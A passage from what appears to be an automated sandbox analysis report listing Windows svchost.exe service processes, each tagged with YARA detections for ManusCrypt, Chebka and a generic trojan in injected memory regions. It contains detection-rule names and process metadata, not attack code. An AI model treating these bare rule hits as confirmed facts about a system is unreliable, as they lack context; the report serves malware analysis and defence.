                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            Target ID:15
                                                                                            Start time:11:02:41
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ffc30280000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            Target ID:20
                                                                                            Start time:11:02:50
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            Target ID:21
                                                                                            Start time:11:02:52
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:22
                                                                                            Start time:11:02:54
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:24
                                                                                            Start time:11:02:57
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:25
                                                                                            Start time:11:02:59
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:26
                                                                                            Start time:11:03:01
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:27
                                                                                            Start time:11:03:04
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:29
                                                                                            Start time:11:03:09
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:30
                                                                                            Start time:11:03:16
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                            Target ID:31
                                                                                            Start time:11:03:18
                                                                                            Start date:02/09/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
